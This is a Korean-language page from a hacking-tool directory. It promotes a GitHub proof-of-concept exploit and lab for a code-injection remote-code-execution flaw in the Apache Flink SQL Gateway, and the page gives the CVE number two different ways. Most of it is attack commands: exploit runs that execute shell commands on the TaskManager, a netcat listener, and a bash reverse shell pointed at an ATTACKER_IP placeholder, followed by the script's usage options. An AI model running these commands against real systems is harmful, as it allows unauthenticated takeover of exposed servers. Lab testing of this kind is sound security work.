Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-25194 — Proof-of-concept exploit and lab environment for CVE-2026-25194 | Kitploit
도구/GitHubGitHub/dexsemon/cve-2026-25194
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Proof-of-concept exploit and lab environment for CVE-2026-25194

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-35194 — Apache Flink SQL 코드 인젝션

SQL 코드 생성 인젝션을 통한 Apache Flink TaskManagers에서의 원격 코드 실행

CVECVE-2026-35194
CVSS8.1 (높음)
CWECWE-94 — 코드 인젝션
AffectedFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Fixed1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Attack SurfaceSQL Gateway REST API (기본 포트 8083, 인증 없음)

빠른 시작

1. 취약한 랩 배포

root@kitploit:~
docker compose up -d

클러스터 시작까지 약 30초 대기. 두 개의 서비스가 올라옵니다:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

확인:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. 종속성 설치

root@kitploit:~
pip install requests

3. 익스플로잇

JSON 벡터:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE 벡터:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

버전 확인만 (RCE 없음):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

TaskManager에서 RCE 확인:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. 리버스 셸

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

사용법

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

면책 조항

승인된 보안 연구 및 교육 목적으로만 사용하세요.

도구 다운로드